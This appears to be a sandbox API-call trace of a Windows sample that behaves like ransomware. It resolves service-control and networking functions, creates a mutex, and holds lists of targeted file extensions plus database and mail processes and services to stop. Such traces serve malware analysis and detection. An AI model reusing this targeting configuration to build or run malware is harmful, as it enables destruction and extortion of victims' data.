	[0028.310] GetProcAddress (hModule=0x76c20000, lpProcName="TerminateProcess") returned 0x76c4d802
	[0028.310] GetProcAddress (hModule=0x76c20000, lpProcName="ExitProcess") returned 0x76c37a10
	[0028.310] GetProcAddress (hModule=0x76c20000, lpProcName="SetErrorMode") returned 0x76c31b00
	[0028.310] SetErrorMode (uMode=0x400) returned 0x0
	[0028.310] SetErrorMode (uMode=0x0) returned 0x400
	[0028.310] GetVersionExA (in: lpVersionInformation=0x18eaa0*(dwOSVersionInfoSize=0x94, dwMajorVersion=0x65006564, dwMinorVersion=0x7373, dwBuildNumber=0x2, dwPlatformId=0xffffffff, szCSDVersion="s}\x16w") | out: lpVersionInformation=0x18eaa0*(dwOSVersionInfoSize=0x94, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
	[0028.310] VirtualAlloc (lpAddress=0x0, dwSize=0x17200, flAllocationType=0x1000, flProtect=0x4) returned 0x230000
	[0028.312] VirtualProtect (in: lpAddress=0x400000, dwSize=0x19000, flNewProtect=0x40, lpflOldProtect=0x18fb28 | out: lpflOldProtect=0x18fb28*=0x2) returned 1
	[0028.344] VirtualFree (lpAddress=0x230000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0028.345] LoadLibraryA (lpLibFileName="KERNEL32.dll") returned 0x76c20000
	[0028.345] GetProcAddress (hModule=0x76c20000, lpProcName="GetProcAddress") returned 0x76c31222
	[0028.345] GetProcAddress (hModule=0x76c20000, lpProcName="LoadLibraryA") returned 0x76c349d7
	[0028.345] GetProcAddress (hModule=0x76c20000, lpProcName="WaitForSingleObject") returned 0x76c31136
	[0028.345] GetProcAddress (hModule=0x76c20000, lpProcName="InitializeCriticalSectionAndSpinCount") returned 0x76c31916
	[0028.345] GetProcAddress (hModule=0x76c20000, lpProcName="LeaveCriticalSection") returned 0x77152270
	[0028.346] GetProcAddress (hModule=0x76c20000, lpProcName="GetLastError") returned 0x76c311c0
	[0028.346] GetProcAddress (hModule=0x76c20000, lpProcName="EnterCriticalSection") returned 0x771522b0
	[0028.346] GetProcAddress (hModule=0x76c20000, lpProcName="ReleaseMutex") returned 0x76c3111e
	[0028.346] GetProcAddress (hModule=0x76c20000, lpProcName="CloseHandle") returned 0x76c31410
	[0028.346] LoadLibraryA (lpLibFileName="msvcr100.dll") returned 0x74ab0000
	[0028.535] GetProcAddress (hModule=0x74ab0000, lpProcName="atexit") returned 0x74acc544
	[0028.535] atexit (param_1=0x210920) returned 0
	[0028.536] LoadLibraryA (lpLibFileName="kernel32.dll") returned 0x76c20000
	[0028.536] GetProcAddress (hModule=0x76c20000, lpProcName="GetProcAddress") returned 0x76c31222
	[0028.536] GetProcAddress (hModule=0x76c20000, lpProcName="GetModuleHandleW") returned 0x76c334b0
	[0028.536] GetProcAddress (hModule=0x76c20000, lpProcName="FindNextFileW") returned 0x76c354ee
	[0028.536] GetProcAddress (hModule=0x76c20000, lpProcName="FindClose") returned 0x76c34442
	[0028.536] GetProcAddress (hModule=0x76c20000, lpProcName="MoveFileW") returned 0x76c49af0
	[0028.536] GetProcAddress (hModule=0x76c20000, lpProcName="GetFileSizeEx") returned 0x76c359e2
	[0028.536] GetProcAddress (hModule=0x76c20000, lpProcName="GetModuleFileNameW") returned 0x76c34950
	[0028.536] GetProcAddress (hModule=0x76c20000, lpProcName="GetFileAttributesW") returned 0x76c31b18
	[0028.536] GetProcAddress (hModule=0x76c20000, lpProcName="ExitProcess") returned 0x76c37a10
	[0028.537] GetProcAddress (hModule=0x76c20000, lpProcName="GetCommandLineW") returned 0x76c35223
	[0028.537] GetProcAddress (hModule=0x76c20000, lpProcName="GetComputerNameW") returned 0x76c3dd0e
	[0028.537] GetProcAddress (hModule=0x76c20000, lpProcName="GetComputerNameA") returned 0x76c4b6e0
	[0028.537] GetProcAddress (hModule=0x76c20000, lpProcName="CreateMutexW") returned 0x76c3424c
	[0028.537] GetProcAddress (hModule=0x76c20000, lpProcName="lstrlenW") returned 0x76c31700
	[0028.537] GetProcAddress (hModule=0x76c20000, lpProcName="lstrlenA") returned 0x76c35a4b
	[0028.537] GetProcAddress (hModule=0x76c20000, lpProcName="GetCurrentProcess") returned 0x76c31809
	[0028.537] GetProcAddress (hModule=0x76c20000, lpProcName="WaitForSingleObject") returned 0x76c31136
	[0028.537] GetProcAddress (hModule=0x76c20000, lpProcName="GetLogicalDrives") returned 0x76c35371
	[0028.537] GetProcAddress (hModule=0x76c20000, lpProcName="GetTickCount") returned 0x76c3110c
	[0028.537] GetProcAddress (hModule=0x76c20000, lpProcName="DeleteFileW") returned 0x76c389b3
	[0028.537] GetProcAddress (hModule=0x76c20000, lpProcName="WideCharToMultiByte") returned 0x76c3170d
	[0028.537] GetProcAddress (hModule=0x76c20000, lpProcName="InitializeCriticalSectionAndSpinCount") returned 0x76c31916
	[0028.537] GetProcAddress (hModule=0x76c20000, lpProcName="Sleep") returned 0x76c310ff
	[0028.537] GetProcAddress (hModule=0x76c20000, lpProcName="LeaveCriticalSection") returned 0x77152270
	[0028.538] GetProcAddress (hModule=0x76c20000, lpProcName="ReadFile") returned 0x76c33ed3
	[0028.538] GetProcAddress (hModule=0x76c20000, lpProcName="CreateFileW") returned 0x76c33f5c
	[0028.538] GetProcAddress (hModule=0x76c20000, lpProcName="OpenMutexW") returned 0x76c35151
	[0028.538] GetProcAddress (hModule=0x76c20000, lpProcName="EnterCriticalSection") returned 0x771522b0
	[0028.538] GetProcAddress (hModule=0x76c20000, lpProcName="WaitForMultipleObjects") returned 0x76c34220
	[0028.538] GetProcAddress (hModule=0x76c20000, lpProcName="lstrcmpiW") returned 0x76c4d5cd
	[0028.538] GetProcAddress (hModule=0x76c20000, lpProcName="lstrcmpiA") returned 0x76c33e8e
	[0028.538] GetProcAddress (hModule=0x76c20000, lpProcName="DeleteCriticalSection") returned 0x771645f5
	[0028.538] GetProcAddress (hModule=0x76c20000, lpProcName="ReleaseMutex") returned 0x76c3111e
	[0028.538] GetProcAddress (hModule=0x76c20000, lpProcName="CloseHandle") returned 0x76c31410
	[0028.538] GetProcAddress (hModule=0x76c20000, lpProcName="GetVersion") returned 0x76c34467
	[0028.538] GetProcAddress (hModule=0x76c20000, lpProcName="CreateThread") returned 0x76c334d5
	[0028.538] GetProcAddress (hModule=0x76c20000, lpProcName="ExpandEnvironmentStringsW") returned 0x76c34173
	[0028.538] GetProcAddress (hModule=0x76c20000, lpProcName="QueryPerformanceCounter") returned 0x76c31725
	[0028.538] GetProcAddress (hModule=0x76c20000, lpProcName="QueryPerformanceFrequency") returned 0x76c341f0
	[0028.538] GetProcAddress (hModule=0x76c20000, lpProcName="GetCurrentProcessId") returned 0x76c311f8
	[0028.539] GetProcAddress (hModule=0x76c20000, lpProcName="SetFileAttributesW") returned 0x76c4d4f7
	[0028.539] GetProcAddress (hModule=0x76c20000, lpProcName="GetVolumeInformationW") returned 0x76c4c860
	[0028.539] GetProcAddress (hModule=0x76c20000, lpProcName="WriteFile") returned 0x76c31282
	[0028.539] GetProcAddress (hModule=0x76c20000, lpProcName="SetFilePointerEx") returned 0x76c4c807
	[0028.539] GetProcAddress (hModule=0x76c20000, lpProcName="SetEndOfFile") returned 0x76c4ce2e
	[0028.539] GetProcAddress (hModule=0x76c20000, lpProcName="FindFirstFileW") returned 0x76c34435
	[0028.539] GetProcAddress (hModule=0x76c20000, lpProcName="GetProcessHeap") returned 0x76c314e9
	[0028.539] GetProcAddress (hModule=0x76c20000, lpProcName="HeapReAlloc") returned 0x77171f6e
	[0028.539] GetProcAddress (hModule=0x76c20000, lpProcName="HeapAlloc") returned 0x7715e026
	[0028.539] GetProcAddress (hModule=0x76c20000, lpProcName="HeapFree") returned 0x76c314c9
	[0028.540] GetProcAddress (hModule=0x76c20000, lpProcName="CreatePipe") returned 0x76cb415b
	[0028.540] GetProcAddress (hModule=0x76c20000, lpProcName="SetHandleInformation") returned 0x76c4195c
	[0028.540] GetProcAddress (hModule=0x76c20000, lpProcName="CreateProcessW") returned 0x76c3103d
	[0028.540] GetProcAddress (hModule=0x76c20000, lpProcName="CompareStringW") returned 0x76c33bca
	[0028.540] GetProcAddress (hModule=0x76c20000, lpProcName="CompareStringA") returned 0x76c33c5a
	[0028.540] GetProcAddress (hModule=0x76c20000, lpProcName="OpenProcess") returned 0x76c31986
	[0028.540] GetProcAddress (hModule=0x76c20000, lpProcName="TerminateProcess") returned 0x76c4d802
	[0028.540] GetProcAddress (hModule=0x76c20000, lpProcName="GetSystemTime") returned 0x76c35a96
	[0028.540] GetProcAddress (hModule=0x76c20000, lpProcName="SystemTimeToFileTime") returned 0x76c35a7e
	[0028.540] GetProcAddress (hModule=0x76c20000, lpProcName="GetLastError") returned 0x76c311c0
	[0028.540] GetProcAddress (hModule=0x76c20000, lpProcName="CreateToolhelp32Snapshot") returned 0x76c5735f
	[0028.540] GetProcAddress (hModule=0x76c20000, lpProcName="Process32NextW") returned 0x76c5896c
	[0028.540] GetProcAddress (hModule=0x76c20000, lpProcName="Process32FirstW") returned 0x76c58baf
	[0028.540] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x74d40000
	[0028.540] GetProcAddress (hModule=0x74d40000, lpProcName="RegOpenKeyExW") returned 0x74d5468d
	[0028.541] GetProcAddress (hModule=0x74d40000, lpProcName="RegQueryValueExW") returned 0x74d546ad
	[0028.541] GetProcAddress (hModule=0x74d40000, lpProcName="RegSetValueExW") returned 0x74d514d6
	[0028.541] GetProcAddress (hModule=0x74d40000, lpProcName="RegCloseKey") returned 0x74d5469d
	[0028.541] GetProcAddress (hModule=0x74d40000, lpProcName="OpenProcessToken") returned 0x74d54304
	[0028.541] GetProcAddress (hModule=0x74d40000, lpProcName="GetTokenInformation") returned 0x74d5431c
	[0028.541] GetProcAddress (hModule=0x74d40000, lpProcName="OpenSCManagerW") returned 0x74d4ca64
	[0028.541] GetProcAddress (hModule=0x74d40000, lpProcName="OpenServiceW") returned 0x74d4ca4c
	[0028.541] GetProcAddress (hModule=0x74d40000, lpProcName="CloseServiceHandle") returned 0x74d5369c
	[0028.541] GetProcAddress (hModule=0x74d40000, lpProcName="ControlService") returned 0x74d67144
	[0028.541] GetProcAddress (hModule=0x74d40000, lpProcName="QueryServiceStatus") returned 0x74d52a86
	[0028.541] GetProcAddress (hModule=0x74d40000, lpProcName="EnumDependentServicesW") returned 0x74d41e3a
	[0028.541] GetProcAddress (hModule=0x74d40000, lpProcName="EnumServicesStatusExW") returned 0x74d4b466
	[0028.541] LoadLibraryA (lpLibFileName="user32.dll") returned 0x74f40000
	[0028.541] GetProcAddress (hModule=0x74f40000, lpProcName="SystemParametersInfoW") returned 0x74f590d3
	[0028.542] LoadLibraryA (lpLibFileName="Shell32.dll") returned 0x75fd0000
	[0030.488] GetProcAddress (hModule=0x75fd0000, lpProcName="ShellExecuteExW") returned 0x75ff1e46
	[0030.488] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77130000
	[0030.488] GetProcAddress (hModule=0x77130000, lpProcName="NtQuerySystemInformation") returned 0x7714fda0
	[0030.488] LoadLibraryA (lpLibFileName="mpr.dll") returned 0x74a90000
	[0030.572] GetProcAddress (hModule=0x74a90000, lpProcName="WNetCloseEnum") returned 0x74a92dd6
	[0030.572] GetProcAddress (hModule=0x74a90000, lpProcName="WNetOpenEnumW") returned 0x74a92f06
	[0030.572] GetProcAddress (hModule=0x74a90000, lpProcName="WNetEnumResourceW") returned 0x74a93058
	[0030.572] LoadLibraryA (lpLibFileName="ws2_32.dll") returned 0x75bc0000
	[0030.742] GetProcAddress (hModule=0x75bc0000, lpProcName="WSAStartup") returned 0x75bc3ab2
	[0030.743] GetProcAddress (hModule=0x75bc0000, lpProcName="socket") returned 0x75bc3eb8
	[0030.743] GetProcAddress (hModule=0x75bc0000, lpProcName="send") returned 0x75bc6f01
	[0030.743] GetProcAddress (hModule=0x75bc0000, lpProcName="recv") returned 0x75bc6b0e
	[0030.743] GetProcAddress (hModule=0x75bc0000, lpProcName="connect") returned 0x75bc6bdd
	[0030.743] GetProcAddress (hModule=0x75bc0000, lpProcName="closesocket") returned 0x75bc3918
	[0030.743] GetProcAddress (hModule=0x75bc0000, lpProcName="gethostbyname") returned 0x75bd7673
	[0030.743] GetProcAddress (hModule=0x75bc0000, lpProcName="inet_addr") returned 0x75bc311b
	[0030.743] GetProcAddress (hModule=0x75bc0000, lpProcName="ntohl") returned 0x75bc2d57
	[0030.743] GetProcAddress (hModule=0x75bc0000, lpProcName="htonl") returned 0x75bc2d57
	[0030.743] GetProcAddress (hModule=0x75bc0000, lpProcName="htons") returned 0x75bc2d8b
	[0030.743] GetProcessHeap () returned 0x7d60000
	[0030.744] RtlAllocateHeap (HeapHandle=0x7d60000, Flags=0x0, Size=0x20) returned 0x7dcf6b8
	[0030.744] QueryPerformanceCounter (in: lpPerformanceCount=0x18f978 | out: lpPerformanceCount=0x18f978*=15066618732) returned 1
	[0030.744] GetTickCount () returned 0x1142c6e
	[0030.744] GetCurrentProcessId () returned 0x934
	[0030.745] GetTickCount () returned 0x1142c6e
	[0030.745] GetTickCount () returned 0x1142c6e
	[0030.745] RtlAllocateHeap (HeapHandle=0x7d60000, Flags=0x0, Size=0x20) returned 0x7dcf6e0
	[0030.745] GetVersion () returned 0x1db10106
	[0030.745] RtlAllocateHeap (HeapHandle=0x7d60000, Flags=0x0, Size=0x7) returned 0x7d707d8
	[0030.745] RtlAllocateHeap (HeapHandle=0x7d60000, Flags=0x0, Size=0x10) returned 0x7d70c38
	[0030.745] RtlReAllocateHeap (Heap=0x7d60000, Flags=0x0, Ptr=0x7d70c38, Size=0x20) returned 0x7dcf730
	[0030.745] RtlReAllocateHeap (Heap=0x7d60000, Flags=0x0, Ptr=0x7dcf730, Size=0x40) returned 0x7dcfd98
	[0030.745] RtlAllocateHeap (HeapHandle=0x7d60000, Flags=0x0, Size=0xfffe) returned 0x7dd0d38
	[0030.746] OpenMutexW (dwDesiredAccess=0x100000, bInheritHandle=0, lpName="Global\\syncronize_URN0LVA") returned 0x0
	[0030.746] CreateMutexW (lpMutexAttributes=0x0, bInitialOwner=0, lpName="Global\\syncronize_URN0LVA") returned 0x88
	[0030.746] HeapFree (in: hHeap=0x7d60000, dwFlags=0x0, lpMem=0x7d707d8 | out: hHeap=0x7d60000) returned 1
	[0030.746] lstrlenW (lpString="Global\\syncronize_") returned 18
	[0030.746] HeapFree (in: hHeap=0x7d60000, dwFlags=0x0, lpMem=0x7dcfd98 | out: hHeap=0x7d60000) returned 1
	[0030.746] RtlAllocateHeap (HeapHandle=0x7d60000, Flags=0x0, Size=0x7) returned 0x7d707d8
	[0030.746] RtlAllocateHeap (HeapHandle=0x7d60000, Flags=0x0, Size=0x10) returned 0x7d70c38
	[0030.746] RtlReAllocateHeap (Heap=0x7d60000, Flags=0x0, Ptr=0x7d70c38, Size=0x20) returned 0x7dcf730
	[0030.746] RtlReAllocateHeap (Heap=0x7d60000, Flags=0x0, Ptr=0x7dcf730, Size=0x40) returned 0x7dcfd98
	[0030.746] RtlAllocateHeap (HeapHandle=0x7d60000, Flags=0x0, Size=0xfffe) returned 0x7de0d40
	[0030.747] OpenMutexW (dwDesiredAccess=0x100000, bInheritHandle=0, lpName="Global\\syncronize_URN0LVU") returned 0x0
	[0030.747] CreateMutexW (lpMutexAttributes=0x0, bInitialOwner=0, lpName="Global\\syncronize_URN0LVU") returned 0x8c
	[0030.747] HeapFree (in: hHeap=0x7d60000, dwFlags=0x0, lpMem=0x7d707d8 | out: hHeap=0x7d60000) returned 1
	[0030.747] lstrlenW (lpString="Global\\syncronize_") returned 18
	[0030.747] HeapFree (in: hHeap=0x7d60000, dwFlags=0x0, lpMem=0x7dcfd98 | out: hHeap=0x7d60000) returned 1
	[0030.747] GetVersion () returned 0x1db10106
	[0030.747] GetCurrentProcess () returned 0xffffffff
	[0030.747] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x18f964 | out: TokenHandle=0x18f964*=0x90) returned 1
	[0030.747] GetTokenInformation (in: TokenHandle=0x90, TokenInformationClass=0x14, TokenInformation=0x18f960, TokenInformationLength=0x4, ReturnLength=0x18f96c | out: TokenInformation=0x18f960, ReturnLength=0x18f96c) returned 1
	[0030.747] CloseHandle (hObject=0x90) returned 1
	[0030.747] WaitForSingleObject (hHandle=0x8c, dwMilliseconds=0x0) returned 0x0
	[0030.747] WaitForSingleObject (hHandle=0x88, dwMilliseconds=0x3e8) returned 0x0
	[0030.747] RtlAllocateHeap (HeapHandle=0x7d60000, Flags=0x0, Size=0x14) returned 0x7d707d8
	[0030.747] RtlAllocateHeap (HeapHandle=0x7d60000, Flags=0x0, Size=0x10) returned 0x7d70c38
	[0030.747] RtlReAllocateHeap (Heap=0x7d60000, Flags=0x0, Ptr=0x7d70c38, Size=0x20) returned 0x7dcf730
	[0030.747] RtlReAllocateHeap (Heap=0x7d60000, Flags=0x0, Ptr=0x7dcf730, Size=0x40) returned 0x7dcfd98
	[0030.747] RtlReAllocateHeap (Heap=0x7d60000, Flags=0x0, Ptr=0x7dcfd98, Size=0x80) returned 0x7dcf2a0
	[0030.747] RtlReAllocateHeap (Heap=0x7d60000, Flags=0x0, Ptr=0x7dcf2a0, Size=0x100) returned 0x7dcf2a0
	[0030.747] RtlAllocateHeap (HeapHandle=0x7d60000, Flags=0x0, Size=0x34) returned 0x7dcf3a8
	[0030.747] RtlAllocateHeap (HeapHandle=0x7d60000, Flags=0x0, Size=0x4) returned 0x7dcf3e8
	[0030.747] RtlAllocateHeap (HeapHandle=0x7d60000, Flags=0x0, Size=0x4) returned 0x7dcf3f8
	[0030.747] RtlAllocateHeap (HeapHandle=0x7d60000, Flags=0x0, Size=0x8) returned 0x7dcf408
	[0030.747] RtlAllocateHeap (HeapHandle=0x7d60000, Flags=0x0, Size=0xc) returned 0x7d70c38
	[0030.747] RtlAllocateHeap (HeapHandle=0x7d60000, Flags=0x0, Size=0x4) returned 0x7dcf418
	[0030.747] RtlAllocateHeap (HeapHandle=0x7d60000, Flags=0x0, Size=0xa) returned 0x7d70c50
	[0030.747] RtlReAllocateHeap (Heap=0x7d60000, Flags=0x0, Ptr=0x7dcf418, Size=0x8) returned 0x7dcf418
	[0030.747] RtlAllocateHeap (HeapHandle=0x7d60000, Flags=0x0, Size=0xc) returned 0x7d70c68
	[0030.747] RtlReAllocateHeap (Heap=0x7d60000, Flags=0x0, Ptr=0x7dcf418, Size=0x10) returned 0x7dcf418
	[0030.747] RtlAllocateHeap (HeapHandle=0x7d60000, Flags=0x0, Size=0xa) returned 0x7d70c80
	[0030.748] RtlAllocateHeap (HeapHandle=0x7d60000, Flags=0x0, Size=0xa) returned 0x7d70c98
	[0030.748] RtlReAllocateHeap (Heap=0x7d60000, Flags=0x0, Ptr=0x7dcf418, Size=0x20) returned 0x7dcf418
	[0030.748] RtlAllocateHeap (HeapHandle=0x7d60000, Flags=0x0, Size=0xc) returned 0x7df0d60
	[0030.748] RtlAllocateHeap (HeapHandle=0x7d60000, Flags=0x0, Size=0xa) returned 0x7df0d78
	[0030.748] RtlReAllocateHeap (Heap=0x7d60000, Flags=0x0, Ptr=0x7dcf3e8, Size=0x8) returned 0x7dcf3e8
	[0030.748] RtlReAllocateHeap (Heap=0x7d60000, Flags=0x0, Ptr=0x7dcf3f8, Size=0x8) returned 0x7dcf3f8
	[0030.748] RtlAllocateHeap (HeapHandle=0x7d60000, Flags=0x0, Size=0x8) returned 0x7dcf440
	[0030.748] RtlAllocateHeap (HeapHandle=0x7d60000, Flags=0x0, Size=0xc) returned 0x7df0d90
	[0030.748] RtlAllocateHeap (HeapHandle=0x7d60000, Flags=0x0, Size=0x4) returned 0x7dcf450
	[0030.748] RtlAllocateHeap (HeapHandle=0x7d60000, Flags=0x0, Size=0xa) returned 0x7df0da8
	[0030.748] RtlReAllocateHeap (Heap=0x7d60000, Flags=0x0, Ptr=0x7dcf450, Size=0x8) returned 0x7dcf450
	[0030.748] RtlAllocateHeap (HeapHandle=0x7d60000, Flags=0x0, Size=0xa) returned 0x7df0dc0
	[0030.748] RtlReAllocateHeap (Heap=0x7d60000, Flags=0x0, Ptr=0x7dcf450, Size=0x10) returned 0x7dcf450
	[0030.748] RtlAllocateHeap (HeapHandle=0x7d60000, Flags=0x0, Size=0xa) returned 0x7df0dd8
	[0030.748] RtlAllocateHeap (HeapHandle=0x7d60000, Flags=0x0, Size=0x8) returned 0x7dcf468
	[0030.748] RtlReAllocateHeap (Heap=0x7d60000, Flags=0x0, Ptr=0x7dcf450, Size=0x20) returned 0x7dcf478
	[0030.748] RtlReAllocateHeap (Heap=0x7d60000, Flags=0x0, Ptr=0x7dcf3e8, Size=0x10) returned 0x7dcf450
	[0030.748] RtlReAllocateHeap (Heap=0x7d60000, Flags=0x0, Ptr=0x7dcf3f8, Size=0x10) returned 0x7dcf4a0
	[0030.748] RtlAllocateHeap (HeapHandle=0x7d60000, Flags=0x0, Size=0x8) returned 0x7dcf3e8
	[0030.748] RtlAllocateHeap (HeapHandle=0x7d60000, Flags=0x0, Size=0xc) returned 0x7df0df0
	[0030.748] RtlAllocateHeap (HeapHandle=0x7d60000, Flags=0x0, Size=0x4) returned 0x7dcf3f8
	[0030.748] RtlAllocateHeap (HeapHandle=0x7d60000, Flags=0x0, Size=0xa) returned 0x7df0e08
	[0030.748] RtlReAllocateHeap (Heap=0x7d60000, Flags=0x0, Ptr=0x7dcf3f8, Size=0x8) returned 0x7dcf3f8
	[0030.748] RtlAllocateHeap (HeapHandle=0x7d60000, Flags=0x0, Size=0x8) returned 0x7dcf4b8
	[0030.748] RtlAllocateHeap (HeapHandle=0x7d60000, Flags=0x0, Size=0xc) returned 0x7df0e20
	[0030.748] RtlAllocateHeap (HeapHandle=0x7d60000, Flags=0x0, Size=0x4) returned 0x7dcf4c8
	[0030.748] RtlAllocateHeap (HeapHandle=0x7d60000, Flags=0x0, Size=0xa) returned 0x7df0e38
	[0030.748] RtlReAllocateHeap (Heap=0x7d60000, Flags=0x0, Ptr=0x7dcf4c8, Size=0x8) returned 0x7dcf4c8
	[0030.748] RtlReAllocateHeap (Heap=0x7d60000, Flags=0x0, Ptr=0x7dcf450, Size=0x20) returned 0x7df1148
	[0030.748] RtlReAllocateHeap (Heap=0x7d60000, Flags=0x0, Ptr=0x7dcf4a0, Size=0x20) returned 0x7df1170
	[0030.748] RtlAllocateHeap (HeapHandle=0x7d60000, Flags=0x0, Size=0x8) returned 0x7dcf4a0
	[0030.748] RtlAllocateHeap (HeapHandle=0x7d60000, Flags=0x0, Size=0xc) returned 0x7df0e50
	[0030.748] RtlAllocateHeap (HeapHandle=0x7d60000, Flags=0x0, Size=0x4) returned 0x7dcf450
	[0030.748] RtlAllocateHeap (HeapHandle=0x7d60000, Flags=0x0, Size=0xa) returned 0x7df0e68
	[0030.748] RtlReAllocateHeap (Heap=0x7d60000, Flags=0x0, Ptr=0x7dcf450, Size=0x8) returned 0x7dcf450
	[0030.748] RtlAllocateHeap (HeapHandle=0x7d60000, Flags=0x0, Size=0x14) returned 0x7dcf4d8
	[0030.748] RtlAllocateHeap (HeapHandle=0x7d60000, Flags=0x0, Size=0x14) returned 0x7df1198
	[0030.749] lstrlenW (lpString="doc(.doc;.docx;.pdf;.xls;.xlsx;.ppt;)arc(.zip;.rar;.bz2;.7z;)dbf(.dbf;)1c8(.1cd;)jpg(.jpg;)") returned 91
	[0030.749] HeapFree (in: hHeap=0x7d60000, dwFlags=0x0, lpMem=0x7dcf2a0 | out: hHeap=0x7d60000) returned 1
	[0030.749] WSAStartup (in: wVersionRequired=0x202, lpWSAData=0x18f9b0 | out: lpWSAData=0x18f9b0) returned 0
	[0030.759] RtlAllocateHeap (HeapHandle=0x7d60000, Flags=0x0, Size=0x10) returned 0x7df0e80
	[0030.759] RtlReAllocateHeap (Heap=0x7d60000, Flags=0x0, Ptr=0x7df0e80, Size=0x20) returned 0x7dcf938
	[0030.759] RtlReAllocateHeap (Heap=0x7d60000, Flags=0x0, Ptr=0x7dcf938, Size=0x40) returned 0x7dcfd98
	[0030.759] RtlReAllocateHeap (Heap=0x7d60000, Flags=0x0, Ptr=0x7dcfd98, Size=0x80) returned 0x7dcf2f8
	[0030.759] RtlReAllocateHeap (Heap=0x7d60000, Flags=0x0, Ptr=0x7dcf2f8, Size=0x100) returned 0x7df1470
	[0030.759] RtlAllocateHeap (HeapHandle=0x7d60000, Flags=0x0, Size=0x10) returned 0x7df0e80
	[0030.759] RtlReAllocateHeap (Heap=0x7d60000, Flags=0x0, Ptr=0x7df0e80, Size=0x20) returned 0x7dcf938
	[0030.759] RtlReAllocateHeap (Heap=0x7d60000, Flags=0x0, Ptr=0x7dcf938, Size=0x40) returned 0x7dcfd98
	[0030.759] RtlReAllocateHeap (Heap=0x7d60000, Flags=0x0, Ptr=0x7dcfd98, Size=0x80) returned 0x7dcf2f8
	[0030.760] RtlReAllocateHeap (Heap=0x7d60000, Flags=0x0, Ptr=0x7dcf2f8, Size=0x100) returned 0x7df1578
	[0030.760] RtlAllocateHeap (HeapHandle=0x7d60000, Flags=0x0, Size=0xc) returned 0x7df0e80
	[0030.760] RtlAllocateHeap (HeapHandle=0x7d60000, Flags=0x0, Size=0x4) returned 0x7dcf2f8
	[0030.760] RtlAllocateHeap (HeapHandle=0x7d60000, Flags=0x0, Size=0x10) returned 0x7df0e98
	[0030.760] RtlReAllocateHeap (Heap=0x7d60000, Flags=0x0, Ptr=0x7dcf2f8, Size=0x8) returned 0x7dcf2f8
	[0030.760] RtlAllocateHeap (HeapHandle=0x7d60000, Flags=0x0, Size=0x14) returned 0x7dcf308
	[0030.760] RtlReAllocateHeap (Heap=0x7d60000, Flags=0x0, Ptr=0x7dcf2f8, Size=0x10) returned 0x7dcf328
	[0030.760] RtlAllocateHeap (HeapHandle=0x7d60000, Flags=0x0, Size=0x18) returned 0x7dcf340
	[0030.760] RtlAllocateHeap (HeapHandle=0x7d60000, Flags=0x0, Size=0x1a) returned 0x7dcf938
	[0030.760] RtlReAllocateHeap (Heap=0x7d60000, Flags=0x0, Ptr=0x7dcf328, Size=0x20) returned 0x7dcf360
	[0030.760] RtlAllocateHeap (HeapHandle=0x7d60000, Flags=0x0, Size=0x1c) returned 0x7dcf960
	[0030.760] RtlAllocateHeap (HeapHandle=0x7d60000, Flags=0x0, Size=0x16) returned 0x7dcf388
	[0030.760] RtlAllocateHeap (HeapHandle=0x7d60000, Flags=0x0, Size=0x1a) returned 0x7dcf988
	[0030.760] RtlAllocateHeap (HeapHandle=0x7d60000, Flags=0x0, Size=0xc) returned 0x7df0eb0
	[0030.760] RtlAllocateHeap (HeapHandle=0x7d60000, Flags=0x0, Size=0x4) returned 0x7dcf2f8
	[0030.760] RtlAllocateHeap (HeapHandle=0x7d60000, Flags=0x0, Size=0x40) returned 0x7dcfd98
	[0030.760] RtlReAllocateHeap (Heap=0x7d60000, Flags=0x0, Ptr=0x7dcf2f8, Size=0x8) returned 0x7dcf2f8
	[0030.760] RtlAllocateHeap (HeapHandle=0x7d60000, Flags=0x0, Size=0x3c) returned 0x7dcfde0
	[0030.760] RtlReAllocateHeap (Heap=0x7d60000, Flags=0x0, Ptr=0x7dcf2f8, Size=0x10) returned 0x7dcf328
	[0030.760] RtlAllocateHeap (HeapHandle=0x7d60000, Flags=0x0, Size=0x14) returned 0x7df1680
	[0030.760] RtlAllocateHeap (HeapHandle=0x7d60000, Flags=0x0, Size=0x18) returned 0x7df16a0
	[0030.760] RtlReAllocateHeap (Heap=0x7d60000, Flags=0x0, Ptr=0x7dcf328, Size=0x20) returned 0x7df16c0
	[0030.760] RtlAllocateHeap (HeapHandle=0x7d60000, Flags=0x0, Size=0x24) returned 0x7df16e8
	[0030.760] lstrlenW (lpString="1c8.exe;1cv77.exe;outlook.exe;postgres.exe;mysqld-nt.exe;mysqld.exe;sqlservr.exe;") returned 81
	[0030.760] HeapFree (in: hHeap=0x7d60000, dwFlags=0x0, lpMem=0x7df1470 | out: hHeap=0x7d60000) returned 1
	[0030.760] lstrlenW (lpString="FirebirdGuardianDefaultInstance;FirebirdServerDefaultInstance;sqlwriter;mssqlserver;sqlserveradhelper;") returned 102
	[0030.760] HeapFree (in: hHeap=0x7d60000, dwFlags=0x0, lpMem=0x7df1578 | out: hHeap=0x7d60000) returned 1
	[0030.760] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x4) returned 0x7df2a90
	[0030.764] EnumServicesStatusExW (in: hSCManager=0x7df2a90, InfoLevel=0x0, dwServiceType=0x30, dwServiceState=0x1, lpServices=0x0, cbBufSize=0x0, pcbBytesNeeded=0x18f94c, lpServicesReturned=0x18f964, lpResumeHandle=0x0, pszGroupName=0x0 | out: lpServices=0x0, pcbBytesNeeded=0x18f94c, lpServicesReturned=0x18f964, lpResumeHandle=0x0) returned 0
	[0030.766] GetLastError () returned 0xea
	[0030.766] RtlAllocateHeap (HeapHandle=0x7d60000, Flags=0x0, Size=0x11e4) returned 0x7df4510
	[0030.766] EnumServicesStatusExW (in: hSCManager=0x7df2a90, InfoLevel=0x0, dwServiceType=0x30, dwServiceState=0x1, lpServices=0x7df4510, cbBufSize=0x11e4, pcbBytesNeeded=0x18f94c, lpServicesReturned=0x18f964, lpResumeHandle=0x0, pszGroupName=0x0 | out: lpServices=0x7df4510, pcbBytesNeeded=0x18f94c, lpServicesReturned=0x18f964, lpResumeHandle=0x0) returned 1
	[0030.767] CloseServiceHandle (hSCObject=0x7df2a90) returned 1
	[0030.772] lstrlenW (lpString="Appinfo") returned 7
